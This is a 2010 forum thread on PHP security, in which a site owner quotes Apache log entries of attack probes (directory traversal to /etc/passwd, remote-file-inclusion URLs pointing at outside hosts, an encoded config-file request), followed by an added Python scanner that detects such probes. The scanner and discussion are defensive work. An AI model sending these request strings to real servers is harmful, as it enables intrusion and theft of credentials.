Re: Shocking amount of PHP security holes? [message #171084 is a reply to message #171079] |
Thu, 23 December 2010 21:25 |
Ignoramus30015
On 2010-12-23, Norman Peelman <npeelman(at)cfl(dot)rr(dot)com> wrote:
> Ignoramus30015 wrote:
>> I have been looking at my apache logs, and I see a tremendous amount
>> of queries that clearly are attempts to hack me.
>>
>> One typical example
>>
>> 87.121.164.1 - - [22/Dec/2010:00:01:10 -0600] "GET /manuals/index.php?bi=./../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" my.site.com
>>
>
> In this case apache returned a '404 Page not found'
Yes, because I do not have index.php. The attacker was probing,
hopeful to find it.
>> Many other examples about, where attackers try to override system
>> variables with web-supplied parameters. Kind of overriding PATH or
>> LD_LIBRARY_PATH variables to subvert setuid programs.
>>
>> My main question is WTF? Why exactly does PHP let remote web users
>> override those variables?
>>
>
> Can you supply an example of this?
Here are some from logs of algebra.com:
64.50.163.80 - - [23/Dec/2010:12:33:30 -0600] "GET /algebra/homework/Sequences-and-series//download.php?view.195/contact.php=I PCop../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 542 "-" "libwww-perl/5.837" www.algebra.com
109.72.95.75 - - [22/Dec/2010:03:35:48 -0600] "GET //bbs//include/print_category.php?setup[use_category]=1&dir=http://www.asdsingapore.com/includes/domit/fx29id1.txt??? HTTP/1.0" 500 - "-" "Mozilla/5.0" www.algebra.com
209.62.76.194 - - [22/Dec/2010:07:09:14 -0600] "GET /algebra//dompdf/dompdf.php?input_file=http://indah1.webs.com/fx29id1.txt??? HTTP/1.0" 500 - "-" "Mozilla/5.0" www.algebra.com
76.12.154.99 - - [22/Dec/2010:07:11:08 -0600] "GET //dompdf/dompdf.php?input_file=http://indah1.webs.com/fx29id1.txt??? HTTP/1.0" 500 - "-" "Mozilla/5.0" www.algebra.com
24.173.234.213 - - [22/Dec/2010:15:47:36 -0600] "GET /admin/file_manager.php/login.php?action=download&filename=%69%6E%63%6C%75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70 HTTP/1.0" 404 542 "http://algebra.com/admin/file_manager.php/login.php?action=download&filename=%69%6E%63%6C%75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70" "Mozilla/4.0 (compatible;
>
>> This situation is why I never permit php software on my servers, with
>> exception of mediawiki. Even here I am very reluctant.
>>
>> I use another language to make websites, and in that language web
>> parameters can be received by querying for them specifically, they do
>> not clobber system variables.
>>
>> Can someone shed light on this, this question bugs me a great deal.
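A small log scanner for the kind of probes quoted in this thread (directory traversal, %00 truncation, /proc/self/environ and remote-file-inclusion attempts), written here as an added example and not code from the original post. The log lines it scans are constructed stand-ins for the entries above, using documentation-range addresses and .invalid hostnames.

```python
import re
from urllib.parse import parse_qsl, unquote

# Apache combined-log prefix: client, ident, user, [time], "METHOD target PROTO", status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Files the probes in the thread try to read; extend this for your own deployment.
SENSITIVE_FILES = ("/etc/passwd", "/proc/self/environ", "configure.php", "config.php")
# Constructed sample lines (192.0.2.0/24 and .invalid are reserved for documentation).
SAMPLE_LOG = """\
192.0.2.10 - - [22/Dec/2010:00:01:10 -0600] "GET /manuals/index.php?bi=./../../../../etc/passwd%00 HTTP/1.0" 404 296 "-" "Mozilla/4.0" www.example.invalid
192.0.2.11 - - [22/Dec/2010:03:35:48 -0600] "GET //bbs//include/print_category.php?setup[use_category]=1&dir=http://attacker.invalid/fx29id1.txt??? HTTP/1.0" 500 - "-" "Mozilla/5.0" www.example.invalid
192.0.2.12 - - [22/Dec/2010:15:47:36 -0600] "GET /admin/file_manager.php?action=download&filename=%69%6E%63%6C%75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70 HTTP/1.0" 404 542 "-" "Mozilla/4.0" www.example.invalid
192.0.2.13 - - [22/Dec/2010:16:00:00 -0600] "GET /algebra/homework/index.html HTTP/1.0" 200 1234 "-" "Mozilla/5.0" www.example.invalid
"""

def decode(value: str) -> str:
    """Percent-decode twice so %2E%2E%2F and double-encoded %252E%252E%252F both yield '../'."""
    return unquote(unquote(value))

def classify_request(target: str) -> set:
    """Return the indicator names found in one request target (path plus query string)."""
    path, _, query = target.partition("?")
    # parse_qsl decodes once already; decode() adds the second pass and also covers the path.
    values = [decode(v) for _, v in parse_qsl(query, keep_blank_values=True)] + [decode(path)]
    hits = set()
    for v in values:
        low = v.lower()
        if "../" in v or "..\\" in v:
            hits.add("traversal")       # climbing out of the web root
        if "\x00" in v:
            hits.add("null-byte")       # %00 to cut off an extension appended by old PHP code
        if low.startswith(("http://", "https://", "ftp://")):
            hits.add("remote-include")  # URL fed to an include/require-style parameter
        if any(f in low for f in SENSITIVE_FILES):
            hits.add("sensitive-file")  # known credential or environment file
    return hits

def scan_log(text: str) -> list:
    """Parse combined-log lines and return one finding per request that trips an indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (hits := classify_request(m["target"])):
            findings.append({"ip": m["ip"], "status": int(m["status"]),
                             "target": m["target"], "indicators": sorted(hits)})
    return findings
```

The decoded view is what matters: the hex-encoded `filename` in the third sample line only reveals itself as a request for `includes/configure.php` after percent-decoding, which is why the rules run on decoded values rather than on the raw request line.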